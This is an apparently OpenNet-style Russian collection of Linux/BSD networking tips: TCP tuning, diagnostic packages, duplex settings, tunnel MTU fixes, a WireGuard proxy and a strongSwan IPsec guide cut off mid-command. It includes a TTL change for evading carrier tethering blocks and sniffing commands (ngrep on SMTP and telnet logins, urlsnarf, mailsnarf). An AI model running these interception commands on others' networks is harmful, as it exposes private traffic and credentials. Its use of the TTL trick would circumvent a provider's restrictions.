netdata (https://github.com/firehol/netdata) - система распределённого мониторинга производительности и работоспособности в реальном времени Рекомендации
https://www.kernel.org/doc/Documentation/sysctl/net.txt
https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt
https://www.kernel.org/doc/Documentation/networking/scaling.txt
https://www.kernel.org/doc/Documentation/networking/proc_net_tcp.txt
https://www.kernel.org/doc/Documentation/networking/multiqueue.txt
http://man7.org/linux/man-pages/man7/tcp.7.html
http://man7.org/linux/man-pages/man8/tc.8.html
http://www.ece.virginia.edu/cheetah/documents/papers/TCPlinux.pdf
https://netdevconf.org/1.2/papers/bbr-netdev-1.2.new.new.pdf
https://blog.cloudflare.com/how-to-receive-a-million-packets/
https://blog.cloudflare.com/how-to-achieve-low-latency/
https://blog.packagecloud.io/eng/2016/06/22/monitoring-tuning-linux-networking-stack-receiving-data/
https://www.youtube.com/watch?v=6Fl1rsxk4JQ
https://oxnz.github.io/2016/05/03/performance-tuning-networking/
https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/xl710-x710-performance-tuning-linux-guide.pdf
https://access.redhat.com/sites/default/files/attachments/20150325_network_performance_tuning.pdf
https://medium.com/@matteocroce/linux-and-freebsd-networking-cbadcdb15ddd
https://blogs.technet.microsoft.com/networking/2009/08/12/where-do-resets-come-from-no-the-stork-does-not-bring-them/
https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/multi-core-processor-based-linux-paper.pdf
http://syuu.dokukino.com/2013/05/linux-kernel-features-for-high-speed.html
https://www.bufferbloat.net/projects/codel/wiki/Best_practices_for_benchmarking_Codel_and_FQ_Codel/
https://software.intel.com/en-us/articles/setting-up-intel-ethernet-flow-director
https://courses.engr.illinois.edu/cs423/sp2014/Lectures/LinuxDriver.pdf
https://www.coverfire.com/articles/queueing-in-the-linux-network-stack/
http://vger.kernel.org/~davem/skb.html
https://www.missoulapubliclibrary.org/ftp/LinuxJournal/LJ13-07.pdf
https://opensourceforu.com/2016/10/network-performance-monitoring/
https://www.yumpu.com/en/document/view/55400902/an-adventure-of-analysis-and-optimisation-of-the-linux-networking-stack
https://lwn.net/Articles/616241/
https://medium.com/@duhroach/tools-to-profile-networking-performance-3141870d5233
https://www.lmax.com/blog/staff-blogs/2016/05/06/navigating-linux-kernel-network-stack-receive-path/
https://es.net/host-tuning/100g-tuning/
http://tcpipguide.com/free/t_TCPOperationalOverviewandtheTCPFiniteStateMachineF-2.htm
http://veithen.github.io/2014/01/01/how-tcp-backlog-works-in-linux.html
https://people.cs.clemson.edu/~westall/853/tcpperf.pdf
http://tldp.org/HOWTO/Traffic-Control-HOWTO/classless-qdiscs.html
https://es.net/assets/Papers-and-Publications/100G-Tuning-TechEx2016.tierney.pdf
https://www.kernel.org/doc/ols/2009/ols2009-pages-169-184.pdf
https://devcentral.f5.com/articles/the-send-buffer-in-depth-21845
http://packetbomb.com/understanding-throughput-and-tcp-windows/
https://www.speedguide.net/bdp.php
https://www.switch.ch/network/tools/tcp_throughput/
https://www.ibm.com/support/knowledgecenter/en/SSQPD3_2.6.0/com.ibm.wllm.doc/usingethtoolrates.html
https://blog.tsunanet.net/2011/03/out-of-socket-memory.html
https://unix.stackexchange.com/questions/12985/how-to-check-rx-ring-max-backlog-and-max-syn-backlog-size
https://serverfault.com/questions/498245/how-to-reduce-number-of-time-wait-processes
https://unix.stackexchange.com/questions/419518/how-to-tell-how-much-memory-tcp-buffers-are-actually-using
https://eklitzke.org/how-tcp-sockets-work
https://www.linux.com/learn/intro-to-linux/2017/7/introduction-ss-command
https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
https://loicpefferkorn.net/2016/03/linux-network-metrics-why-you-should-use-nstat-instead-of-netstat/
http://assimilationsystems.com/2015/12/29/bufferbloat-network-best-practice/

Актуальность опции TCP_NODELAY для распределённых приложений (доп. ссылка 1) [комментарии]

Один из инженеров Amazon Web Services (AWS) разобрал заблуждения, связанные с повышением эффективности передачи мелких сообщений при использовании алгоритма Нейгла, применяемого по умолчанию в TCP/IP стеке. Рекомендации сводятся к отключению по умолчанию алгоритма Нейгла через выставление опции TCP_NODELAY для сетевых сокетов при помощи вызова setsockopt. setsockopt(descriptor, SOL_TCP, TCP_NODELAY, &one, sizeof(one)); Алгоритм Нейгла позволяет агрегировать мелкие сообщения для снижения трафика - приостанавливает отправку новых сегментов TCP до получения подтверждения о приёме ранее отправленных данных. Например, без применения агрегирования при отправке 1 байта, дополнительно отправляется 40 байтов с заголовками пакета. В современных условиях использование алгоритма Нейгла приводит к заметному возрастанию задержек, неприемлемых для интерактивных и распределённых приложений. Приводится три основных довода в пользу использования по умолчанию опции TCP_NODELAY, отключающей алгоритм Нейгла: 1. Несовместимость алгоритма Нейгла с оптимизацией "delayed ACK", при которой ACK-ответ направляется не сразу, а после получения ответных данных. Проблема в том, что в алгоритме Нейгла поступление ACK-пакета является сигналом для отправки агрегированных данных, а если ACK-пакет не поступил, отправка выполняется при наступлении таймаута. Таким образом, возникает замкнутый круг и ACK-пакет как сигнал не работает, так как другая сторона не получает данные из-за их накопления на стороне отправителя, а отправитель не отправляет их до таймаута, так как не получает ACK-пакет. 2. RFC для алгоритма Нейгла принят в 1984 году и он не рассчитан на параметры современных высокоскоростных сетей и серверов в датацентрах, что приводит к возникновению проблем с отзывчивостью. Задержка между отправкой запроса и получением ответа (RTT) в современных сетях составляет 0.5 мс + несколько миллисекунд при обмене данными между датацентрами в одном регионе + до сотни миллисекунд при отправке по всему миру. За эти миллисекунды современный сервер способен выполнить огромный объём работы. 3. Современные распределённые приложения давно не отправляют единичные байты данных, а агрегирование мелких данных обычно реализуется на уровне приложения. Даже если размер полезных данных составляет 1 байт, то, как правило, фактически размер отправляемой информации существенно возрастает после применения сериализации, использования API-обвязок в JSON и отправки с использованием TLS-шифрования. Экономия 40 байтов становится не столь актуальной.

Полезные пакеты, которые можно установить на сервер для диагностики сбоев (доп. ссылка 1) [комментарии]

Минимальный набор пакетов для диагностики проблем, которые рекомендуется заранее установить на серверы, чтобы не тратить время на установку дополнительных пакетов или поиск специализированных live-дистрибутивов. Установка диагностических утилит во время сбоя может превратиться в решение отдельной проблемы или потребовать много времени, учитывая то, что во время сбоя может пропадать сетевое соединение, возникнуть проблемы с DNS, наблюдаться большие потери пакетов или снижение полосы пропускания, возникать большие задержки ввода команд из-за высокой нагрузки на CPU или исчерпания памяти, дисковый раздел может быть переведён в режим только для чтения и т.п. Список пакетов для предустановки (названия для Ubuntu) и поставляемые в них диагностические утилиты:
procps - утилиты ps, vmstat, uptime, top
util-linux - dmesg, lsblk, lscpu (общая статистика, информация о блочных устройствах и CPU)
sysstat - iostat, mpstat, pidstat, sar (оценка производительности)
iproute2 - ip, ss, nstat, tc (настройка сети и управление трафиком)
numactl - numastat (статистика по NUMA)
tcpdump - tcpdump (анализ трафика)
linux-tools-common и linux-tools-$(uname -r) - perf, turbostat (профилировние и мониторинг производительности)
bpfcc-tools (bcc) - opensnoop, execsnoop, runqlat, softirqs, hardirqs, ext4slower, ext4dist, biotop, biosnoop, biolatency, tcptop, tcplife, trace, argdist, funccount, profile (диагностика на базе eBPF)
bpftrace - bpftrace, opensnoop, execsnoop, runqlat, biosnoop (диагностика на базе eBPF)
trace-cmd - trace-cmd (CLI-интерфейс для ftrace)
nicstat - nicstat (информация о сетевых устройствах)
ethtool - ethtool (информация о сетевых устройствах)
tiptop - tiptop (PMU/PMC top)
cpuid - cpuid (информация о CPU)
msr-tools - rdmsr, wrmsr (информация о CPU) sudo apt install procps util-linux sysstat iproute2 numactl tcpdump linux-tools-common linux-tools-$(uname -r) bpfcc-tools bpftrace trace-cmd nicstat ethtool tiptop cpuid msr-tools

Обход блокировки сотовыми операторами использования смартфона в качестве точки доступа [комментарии]

Некоторые сотовые операторы начали вводить в практику блокировку или замедление доступа для соединений, установленных со сторонних устройств, подключающихся через смартфон, работающий в режиме точки доступа ("tethering"). Как правило подобные блокировки основываются на привязке к TTL и обойти их можно увеличив TTL с 64 до 65, что скроет наличие дополнительного хоста в цепочке. В системах на базе ядра Linux: sysctl net.ipv4.ip_default_ttl=65 Во FreeBSD: sysctl net.inet.ip.ttl=65 Изменить TTL для транзитных пакетов в Linux можно при помощи пакетного фильтра: iptables -t mangle -A POSTROUTING -o usb0 -j TTL --ttl-set 65

Решение проблемы с uTP-протоколом uTorrent (доп. ссылка 1) Автор: Zzz [комментарии]

По многочисленным наблюдениям системных администраторов различных компаний предоставляющих доступ к сети интернет, с начала февраля 2010 года наблюдается ежедневный лавинообразный рост количества пакетов в сети, их фрагментация, а также существенный рост исходящего трафика. Данная проблема связана с новой версией торрент-клиента uTorrent вышедшего 3 февраля 2010 года с поддержкой протокола uTP, работающего поверх UDP. Призванный снизить нагрузку на провайдеров протокол uTP в результате привел к обратному эффекту. Для относительно безболезненной для клиента фильтрации uTP на шлюзе под управлением Linux рекомендуется использовать следующее правило: /sbin/iptables -I FORWARD -m udp -p udp -m string --hex-string "|7F FF FF FF AB|" --algo kmp \ --from 40 --to 44 -m statictic --mode random --probability 0.90 -j DROP Мониторинг работы правила: iptables -L FORWARD -nv | grep statist Для FreeBSD правило будет выглядеть следующим образом: ngctl mkpeer ipfw: bpf 2 main ngctl name ipfw:2 utp_filter ngctl msg utp_filter: setprogram { thisHook=\"main\" ifMatch=\"\" ifNotMatch=\"main\" bpf_prog_len=12 bpf_prog=[ { code=48 jt=0 jf=0 k=0 } { code=84 jt=0 jf=0 k=240 } { code=21 jt=0 jf=8 k=64 } { code=48 jt=0 jf=0 k=9 } { code=21 jt=0 jf=6 k=17 } { code=40 jt=0 jf=0 k=6 } { code=69 jt=4 jf=0 k=8191 } { code=177 jt=0 jf=0 k=0 } { code=64 jt=0 jf=0 k=20 } { code=21 jt=0 jf=1 k=2147483647 } { code=6 jt=0 jf=0 k=65535 } { code=6 jt=0 jf=0 k=0 } ] } ipfw add 2 netgraph 2 udp from any to any iplen 0-128 Мониторинг: ngctl msg utp_filter: getstats \"main\"

Tshark для мониторинга запросов http (доп. ссылка 1) Автор: CHAPPAY [комментарии]

Tshark из комплекта сниффера Wireshark (http://www.wireshark.org/) позволяет наглядно проследить запросы к http-серверу. Пример для интерфейса eth0: tshark -npi eth0 -f 'tcp and dst port 80' -R "http.request.method" -T fields -e ip.src -e ip.dst \ -e http.request.method -e http.host -e http.request.uri За одним можно автоматически найти имя интерфейса в Linux и удалить временные файлы, которые программа обычно забывает удалять. Для Linux: tshark -npi `netstat -rn | grep "^0.0.0.0" | awk '{ print $8 }'` \ -f 'tcp and dst port 80' -R "http.request.method" -T fields -e ip.src \ -e ip.dst -e http.request.method -e http.host -e http.request.uri rm -f /tmp/ether* Для FreeBSD: tshark -npi `netstat -rn | grep "default" | awk '{ print $6 }'` \ -f 'tcp and dst port 80' -R "http.request.method" -T fields -e ip.src \ -e ip.dst -e http.request.method -e http.host -e http.request.uri rm -f /tmp/ether* Для уменьшения нагрузки можно ограничить выборку пакетами небольшой длины, добавив "and less 600", например, "tcp and dst port 80 and less 600". Другие варианты: 1. утилита urlsnarf из состава пакета dsniff. Также можно отметить и другие похожие утилиты из данного пакета: filesnarf, mailsnarf, msgsnarf, webspy, позволяющие перехватывать почтовые сообщения, передаваемые файлы и т.п. urlsnarf -i eth0 urlsnarf -i eth1 -n .\* tcp port 80 and less 600 2. justniffer (http://justniffer.sourceforge.net/) - выводит перехваченные HTTP-пакеты в формате стандартного лога Apache: justniffer -i eth0 Позволяет оценивать время выполнения запроса: justniffer -i eth0 -a " %response.time" Выводить полный дамп HTTP-заголовков: justniffer -i eth0 -r Самостоятельно определять формат вывода: justniffer -i eth0 -l " %request.timestamp %source.ip %dest.ip %request.header.host %request.url"

Решение проблемы с крахом Net-SNMP [обсудить]

В один прекрасный момент Net-SNMP начал слетать с оставлением в логе ошибки: error on subcontainer 'ia_addr' insert (-1) error on subcontainer 'ia_index' insert (-1) couldn't map value 56 for ipAddressAddrType Слетал в произвольный момент после нескольких минут ответов на запросы. Мониторинг через: tcpdump -i any -n udp port 161 не показал какой-то зависимости падения от типа входящих запросов. В итоге оказалось, что случайно на два разных vlan интерфейса добавили один и тот же IP, это и приводило к столь странному краху snmpd. В Linux при большом числе VLAN или PPP интерфейсов, дубликат можно определить командой: ifconfig|grep 'inet addr'|awk '{print $2}'|sort|uniq -c |sort -n -r|head При необходимости наличия дубликатов, например, в ситуации когда в нескольких виртуальных окружениях одинаковые IP, проблему поможет решить патч: http://www.redhat.com/archives/fedora-extras-commits/2007-November/msg04807.html

Управление дуплексным режимом и скоростью линка в различных ОС. (доп. ссылка 1) [комментарии]

Solaris Проверка: ndd /dev/hme link_mode 0 = half duplex, 1 = full duplex Установка full duplex: ndd -sec /dev/hme adv_100fdx_cap ndd -set /dev/hme adv_autoneg_cap 0 Установка half duplex: ndd -sec /dev/hme adv_100hdx_cap ndd -set /dev/hme adv_autoneg_cap 0 Linux Текущее состояние mii-tool eth0 ethtool eth0 Установка full duplex: mii-tool -F 100baseTx-FD eth0 ethtool -s eth0 speed 1000 duplex full autoneg off некоторые драйверы можно настроить через /etc/modules.conf options eepro100 options=48 options 3c59x options=0x204 full_duplex=0x200 FreeBSD Установка full duplex: ifconfig xl0 media 100baseTX mediaopt full-duplex Установка half duplex: ifconfig xl0 media 100baseTX mediaopt half-duplex IBM AIX Список адаптеров и проверка режима: lsdev -HCc adapter lsattr -d ent# Установка full duplex: chdev -l ent# -a media_speed=100_Full_Duplex -P Установка half duplex: chdev -l ent# -a media_speed=100_Half_Duplex -P HP-UX Список адаптеров и проверка режима: lanscan -n (HP-UX 10.x) lanscan -p (HP-UX 11.x) lanadmin -x NMid# (HP-UX 10.x) lanadmin -x PPA# (HP-UX 11.x) Установка full duplex: lanadmin -X 100FD NMid# (HP-UX 10.x) lanadmin -X 100FD PPA# (HP-UX 11.x) Установка half duplex: lanadmin -X 100HD NMid# (HP-UX 10.x) lanadmin -X 100HD PPA# (HP-UX 11.x)

Как увеличить размер таблицы контроля сессий ip_conntrack в Linux [комментарии]

Если ядро ругается "kernel: ip_conntrack: table full, dropping packet.", причину флуда (скорее всего вирус или сканирование портов) можно найти по списку /proc/net/ip_conntrack Если просто общая загрузка большая, увеличить размер таблицы можно через /proc/sys/net/ipv4/ip_conntrack_max Также можно увеличить размерность хэша через параметр hashsize модуля ip_conntrack: /etc/modules.conf: options ip_conntrack hashsize=N Более тонкий тюнинг можно произвести через переменные определенные в /proc/sys/net/ipv4/netfilter

Примеры использования ngrep для выборки и просмотра содержимого пакетов (доп. ссылка 1) Автор: Mayank Sharma [комментарии]

ngrep служит для отображения проходящих сетевых пакетов удовлетворяющих заданной маске. Как мне кажется ngrep гораздо проще и удобнее, чем tcpdump. Вот несколько примеров: Показать содержимое всех пакетов, прошедших по 80 порту, со словом google ngrep google port 80 Вывод пакетов удовлетворяющих маске по одному в строке, для интерфейса eth0: ngrep -i \'game*|chat|recipe\' -W byline -d eth0 Слушать весь SMTP трафик на всех сетевых интерфейсах: ngrep -i \'rcpt to|mail from\' -d any tcp port smtp Показать текущее время для каждого совпадения (кто и когда заходит на машину телнетом): ngrep -q -t -wi "login" port 23

Почему в FreeBSD 5.3 не работает форвадинг пакетов (ipfw fwd) (доп. ссылка 1) Автор: Bushi [комментарии]

Это ошибка в FreeBSD 5.3, патч здесь: http://www.freebsd.org/cgi/query-pr.cgi?pr=kern/71910

Как сгенерировать IPv6 пакет для отладки сети. (доп. ссылка 1) [обсудить]

# netwox 142 --device "Eth0" --eth-dst "0:8:9:a:b:c" --ip6-src "fec0:0:0:1::1" --ip6-dst "fec0:0:0:1::2" --tcp-src "1234" --tcp-dst "80" --tcp-syn # netwox 142 --device "Eth0" --eth-src "00:11:22:33:44:55" --eth-dst "0:8:9:a:b:c" --ip6-src "fec0:0:0:1::1" --ip6-dst "fec0:0:0:1::2" --tcp-src "1235" --tcp-dst "80" --tcp-syn 142 - код операции "Spoof EthernetIp6Tcp", netwox - http://laurentconstantin.by.ru/ru/

Почему при использовании туннеля возникают проблемы с некоторыми хостами. (доп. ссылка 1) [комментарии]

Выход - поставить на интерфейсе туннеля MTU 1500, вместо 1476. Проблема возникает при попытке протолкнуть пакет размером 1500 байт с выставленным DF (don't fragment запрещена фрагментация) битом через интерфейс 1476 байт. Другие решения: interface ethernet0 ip policy route-map clear-df route-map clear-df permit 10 match ip address 101 set ip df 0 access-list 101 permit tcp 10.1.3.0 0.0.0.255 any или interface tunnel0 ip tcp adjust-mss 1436

В чем может быть причина неработы ассиметричного рутинга под Linux. (доп. ссылка 1) [обсудить]

Linux отказывается маршрутизировать пакеты между двумя сетевыми картами, кода пакет входит через один интерфейс и выходит через другой, если включен rp_filter (RFC1812). Необходимо отключить rp_filter: /sbin/sysctl -w net.ipv4.conf.default.rp_filter = 0 /sbin/sysctl -w net.ipv4.conf.all.rp_filter = 0 Для FreeBSD можно посоветовать: в /etc/rc.conf: tcp_extensions="NO" или sysctl -w net.inet.tcp.rfc1323=0 А так же sysctl -w net.inet.tcp.rfc1644=1 и sysctl -w net.inet.tcp.rfc1323=0

С чем может быть связаны потери пакетов и нестабильная работа ethernet карт ? (доп. ссылка 1) [комментарии]

Приходилось сталкиваться с проблемами согласования режимов работы карт Intel EtherExpress 100 и Reltek RTL-8139 c коммутаторами и концентраторами различных производителей. Несогласование проявляется, например в работе карты в режиме half-duplex, а свича в full-duplex и т.д. (в linux: /sbin/mii-tool -F 100baseTx-FD eth0)

Почему выкачиваются данные с машины нормально, как только пытаюсь что-то закачать - соединение останавливается, даже через ssh больше 5 мин. не удается поработать. Другие машины работают нормально. [комментарии]

Неоднократно замечена проблема работы сетевых карт на базе RealTek 8129/8139 (машины под FreeBSD, но с другими ОС тоже проявляется) с некоторыми концентраторами и коммутаторами. Проявляется в замирании сессий до истечения таймаута. Диагностика: ping -s N remote_ip, при больших N не проходят. Решение: Смените сетевую карту, например, на Intel EtherExpress Pro.

Почему лог почтового сервера изобилует сообщениями о разрыве по Timeout, часто, при приеме большого объема данных, прокачка останавливается и замирает до истечения таймаута ? [комментарии]

Вероятные причины: Туннель, блокировка ICMP, "path MTU discovery" и ECN (Explicit Congestion Notification, ECN проявляется в основном при доступе через Proxy). При блокировке ICMP трафика, возможно блокируется не только echo_replay/echo_request ICMP сообщения, но и другие важные сообщения передаваемые по ICMP. При блокировке ICMP сообщений типа 3.4 (fragmentation needed and DF set) возможно нарушение нормальной фрагментации пакетов, что вполне может проявляться как внезапная остановка передачи данных большого объема и разрыв сесcии по таймауту, например, если на пути трафика встречается туннель. Одним из путей решением проблемы, является установка на туннеле MTU > 1500 и отмена блокировки ICMP трафика. Проблемы с ECN в Linux лечатся: echo 0 >/proc/sys/net/ipv4/tcp_ecn path MTU discovery: Linux: echo 1 > /proc/sys/net/ipv4/ip_no_pmtu_disc FreeBSD: sysctl -w net.inet.tcp.rfc1323=0

Туннелинг, VPN, VLAN

Выборочное туннелирование сайтов через WireGuard Автор: Аноним [комментарии]

Идея проста: на localhost поднимается SOCKS5 proxy, проталкивающий информацию на ту сторону туннеля WireGuard. Соответственно, селективность достигается путём использования прокси для нужных соединений. 1. Клонируем https://github.com/zhsj/wghttp 2. Ставим golang 3. Собираем go build При надобности используем GOOS и GOARCH для кросс-сборки. 4. Читаем wghttp --help и изучаем переменные окружения, используемые для конфигурации. 5. Пишем сценарий оболочки/программу, выставляющий переменные окружения в нужные значения и запускающий прокси. 6. Пишем unit systemd или используем NSSM/WinSW, запускаем службу. Желательно дать сервису минимально возможные права. а именно доступ к файловой системе ему не должен быть нужен вообще. 7а. Устанавливаем браузерное дополнение FoxyProxy Standard (имеется порт для браузеров на основе Chromium). Конфигурируем его использовать свежеподнятый прокси для нужных сайтов. 7б или устанавливаем браузерное дополнение Proxy SwitchyOmega Конфигурируем его использовать свежеподнятый прокси для нужных сайтов. 7в. В качестве альтернативы можно использовать pac-файлы. 8. PROFIT PS: можно поднять в Docker. docker-compose.yaml services: wghttp: image: 'ghcr.io/zhsj/wghttp:latest' container_name: wghttp restart: always ports: - '1082:1082' environment: LISTEN: '0.0.0.0:1080' # SOCKS5 port optional default localhost:8080 CLIENT_IP: 10.xx.xx.x PRIVATE_KEY: yHHxxxxxxxxxxxxxxxxxxxxxcH4Hk8= PEER_KEY: u57MDxxxxxxxxxxxxxxxxx7Pb1CMaP0Gk= PEER_ENDPOINT: 'xxxxxxxxxx.duckdns.org:4xxx4' DNS: 8.8.8.8 # optional MTU: 1450 # optional default 1280 # PRESHARED_KEY=pupxxxxxxxxxxxxxxxxxxxxxxxxxxxxem4= # optional

Как в mpd5 присвоить определенный номер для ng интерфейса (доп. ссылка 1) Автор: Слава [комментарии]

Несколько интерфейсов, например два, можно сделать следующим образом: create bundle static NAME create link static NAME1 TYPE set link action bundle NAME create link static NAME2 TYPE set link action bundle NAME В результате получится два интерфейса, у одного будет жестко ng0, у второго ng1, они появятся в системе сразу после запуска mpd, просто будут в DOWN, пока mpd не поднимет линки.

IPsec между Strongswan 5.0.4 (FreeBSD) и Strongswan 1.2.3 (Android) (доп. ссылка 1) Автор: YetAnotherOnanym [комментарии]

1. Устанавливаем Strongswan на FreeBSD, компилируем ядро с поддержкой IPsec. Устанавливаем на Android Strongswan из Google Play. 2. Создаём сертификаты. Сначала ключ и сертификат CA: openssl genrsa -out ipsec-test_CA_key.pem -aes256 -passout stdin 2048 openssl req -x509 -new -sha512 -days 3652 -set_serial 0 -out ipsec-test_CA.pem \\ -key ipsec-test_CA_key.pem -passin stdin -passout stdin -verbose \\ -subj "/C=RU/ST=My state/L=My city/O=My IT Lab/OU=My CA dept\\ /CN=My personal CA/emailAddress=me@mymailhost" 3. После этого в /etc/ssl/openssl.cnf находим секцию "[usr_cert]" и добавляем строку с именем своего хоста: subjectAltName = DNS:ipsec-test.dyndns.org Это должно быть реально существующее DNS-имя - по нему Android будет находить стационарный хост. В данном случае, когда провайдер назначает на внешний интерфейс модема/роутера динамический "белый" IP-адрес, используется имя на бесплатном сервисе dyndns.org. С другими провайдерами возможны какие-то другие варианты. Создаём сертификат стационарного хоста (поскольку это первый сертификат нашего CA, указываем параметр -CAcreateserial) openssl genrsa -out 'ipsec-test.dyndns.org_key.pem' 2048 openssl req -new -sha512 -days 3652 -out 'ipsec-test.dyndns.org_req.pem' \\ -key 'ipsec-test.dyndns.org_key.pem' -passin stdin -passout stdin \\ -subj "/C=RU/ST=My state/L=My city/O=My IT Lab/OU=My CA dept\\ /CN=ipsec-test.dyndns.org/subjectAltName=DNS:ipsec-test.dyndns.org\\ /emailAddress=me@mymailhost" openssl x509 -req -sha512 -days 3652 -extfile /etc/ssl/openssl.cnf \\ -extensions "usr_cert" -CA ipsec-test_CA.pem -CAkey ipsec-test_CA_key.pem \\ -CAcreateserial -CAserial ipsec-test_CA_serial \\ -in 'ipsec-test.dyndns.org_req.pem' -out 'ipsec-test.dyndns.org_cert.pem' Строго говоря, указывать параметр "subjectAltName=DNS:ipsec-test.dyndns.org" в строке subject не обязательно, значение имеет расширение x.509v3, заданное в openssl.cnf. В строку subject этот параметр добавлен для красоты, на самом деле ;). Проверяем сертификат: openssl x509 -in ipsec-test.dyndns.org_cert.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 8a:55:5e:dd:bb:22:20:cc Signature Algorithm: sha512WithRSAEncryption Issuer: C=RU, ST=My state, L=My city, O=My IT Lab, OU=My CA dept, CN=My personal CA/emailAddress=me@mymailhost Validity Not Before: Oct 14 23:13:38 2013 GMT Not After : Oct 14 23:13:38 2023 GMT Subject: C=RU, ST=My state, L=My city, O=My IT Lab, OU=My CA dept, CN=ipsec-test.dyndns.org/subjectAltName=DNS:ipsec-test.dyndns.org/emailAddress=me@mymailhost (...) X509v3 Subject Alternative Name: DNS:ipsec-test.dyndns.org (...) 4. Теперь создадим ключ и сертификат для мобильного устройства. Вообще-то, параметр "subjectAltName" в openssl.cnf можно теперь не указывать (закомментировать) - это связано с тем, что мобильный Strongswan в качестве своего ID передаёт строку subject своего сертификата (при том, что сам требует от партнёра ID, совпадающий с FQDN или IP-адресом). Всё же для соблюдения единообразия зададим в openssl.cnf "subjectAltName = DNS:android" и сгенерируем сертификат: openssl genrsa -out android_key.pem 2048 openssl req -new -sha512 -days 3652 -out android_req.pem \\ -key android_key.pem -passin stdin -passout stdin \\ -subj "/C=RU/ST=My state/L=My city/O=My IT Lab/OU=My CA dept\\ /CN=android/subjectAltName=DNS:android/emailAddress=me@mymailhost" Проверяем сертификат: openssl x509 -in android_cert.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 8a:55:5e:dd:bb:22:20:cd Signature Algorithm: sha512WithRSAEncryption Issuer: C=RU, ST=My state, L=My city, O=My IT Lab, OU=My CA dept, CN=My personal CA/emailAddress=me@mymailhost Validity Not Before: Oct 15 19:58:45 2013 GMT Not After : Oct 15 19:58:45 2023 GMT Subject: C=RU, ST=My state, L=My city, O=My IT Lab, OU=My CA dept, CN=android/subjectAltName=DNS:android /emailAddress=me@mymailhost (...) Теперь преобразуем сертификат в формат PKCS#12: openssl pkcs12 -export -out android_cert.p12 -in android_cert.pem \\ -inkey android_key.pem -name Android -passout stdin -passin stdin 5. Конвертируем сертификаты и ключи в формат DER (в debug-выводе charon присутствуют жалобы на плагин PEM, поэтому не будем пользоваться форматом PEM): openssl x509 -in ipsec-test_CA.pem -out ipsec-test_CA.der -inform pem -outform der openssl rsa -in ipsec-test.dyndns.org_key.pem -out ipsec-test.dyndns.org_key.der -inform pem -outform der openssl x509 -in ipsec-test.dyndns.org_cert.pem -out ipsec-test.dyndns.org_cert.der -inform pem -outform der openssl x509 -in android_cert.pem -out android_cert.der -inform pem -outform Создаём ссылку: ln -s /etc/ssl/certs/ipsec-test/ipsec-test_CA.der /usr/local/etc/ipsec.d/cacerts 6. Создаём файл конфигурации ipsec.conf: # ipsec.conf - strongSwan IPsec configuration file config setup # strictcrlpolicy=no # uniqueids = yes ca ipsec-test cacert = /etc/ssl/certs/ipsec-test/ipsec-test_CA.der conn android keyexchange = ikev2 ike = AES_CBC_256-HMAC_SHA2_512-MODP4096 esp = AES_CBC_256-HMAC_SHA2_256 type = tunnel leftsourceip = 192.168.254.1 rightsourceip = 192.168.254.2 auto = start leftauth = pubkey rightauth = pubkey left = 192.168.203.3 right = %any leftsubnet = 192.168.203.3 leftca = "C=RU, ST=My state, L=My city, O=My IT Lab, OU=My CA dept, CN=My personal CA/emailAddress=me@mymailhost" rightca = "C=RU, ST=My state, L=My city, O=My IT Lab, OU=My CA dept, CN=My personal CA/emailAddress=me@mymailhost" leftcert = /etc/ssl/certs/ipsec-test/ipsec-test.dyndns.org_cert.der rightcert = /etc/ssl/certs/ipsec-test/android_cert.der leftid = "ipsec-test.dyndns.org" rightid = " C=RU, ST=My state, L=My city, O=My IT Lab, OU=My CA dept, CN=android/subjectAltName=DNS:android/emailAddress=me@mymailhost" 7. Создаём файл ipsec.secrets: "ipsec-test.dyndns.org" : RSA /etc/ssl/certs/ipsec-test/ipsec-test.dyndns.org_key.der 8. Устанавливаем сертификаты на мобильное устройство. Копируем сертификат android_cert.p12 и сертификат УЦ ipsec-test_CA.crt (сменив расширение .pem на .crt - это существенно) в корень SD-карты мобильного устройства. Устанавливаем сертификаты: Настройки -> Безопасность -> Установить из памяти (Для сертификата в формате PKCS#12 надо буде ввести пароль, заданный в п.4). 9. Настраиваем мобильный Strongswan. В качестве шлюза задаём FQDN стационарного хоста ipsec-test.dyndns.org (оно же будет и "peer ID"), тип - IKEv2 Сертификат, выбираем загруженный и установленный сертификат мобильного устройства, указываем вручную сертификат нашего УЦ (скриншот). 10. Сохраняем, устанавливаем соединение. Вуаля! 11. Проверяем состояние стационарного хоста (да, утилита setkey - это из racoon, но я к ней привык ;)): setkey -D 192.168.203.3 XXX.XXX.XXX.XXX esp mode=tunnel spi=3944322401(0xeb199561) reqid=1(0x00000001) E: rijndael-cbc 7b45804f 3e75bd59 7092e7ac dae00600 A: hmac-sha1 ec42cbbf e49848a9 72620762 bc97d0cb 6bfb8412 seq=0x00000000 replay=32 flags=0x00000000 state=mature created: Oct 17 17:29:48 2013 current: Oct 17 17:30:05 2013 diff: 17(s) hard: 3600(s) soft: 2957(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=1 pid=902 refcnt=1 XXX.XXX.XXX.XXX 192.168.203.3 esp mode=any spi=3276763214(0xc34f704e) reqid=1(0x00000001) E: rijndael-cbc 70c5b1df dc0932a9 d8c8558b bd44caf7 A: hmac-sha1 f3161cbc 50952da1 c298b3af 77008587 8bbc4f1f seq=0x00000000 replay=32 flags=0x00000000 state=mature created: Oct 17 17:29:48 2013 current: Oct 17 17:30:05 2013 diff: 17(s) hard: 3600(s) soft: 2560(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=0 pid=902 refcnt=1 setkey -DP 192.168.254.2[any] 192.168.203.3[any] any in ipsec esp/tunnel/XXX.XXX.XXX.XXX-192.168.203.3/unique:1 created: Oct 17 17:29:48 2013 lastused: Oct 17 17:29:48 2013 lifetime: 2147483647(s) validtime: 0(s) spid=4 seq=1 pid=917 refcnt=1 192.168.203.3[any] 192.168.254.2[any] any out ipsec esp/tunnel/192.168.203.3-XXX.XXX.XXX.XXX/unique:1 created: Oct 17 17:29:48 2013 lastused: Oct 17 17:29:48 2013 lifetime: 2147483647(s) validtime: 0(s) spid=3 seq=0 pid=917 refcnt=1 XXX.XXX.XXX.XXX - IP-адрес внешнего интерфейса шлюза провайдера (трафик проходит через NAT). В одной консоли запускаем "tcpdump -i ep1 -n host 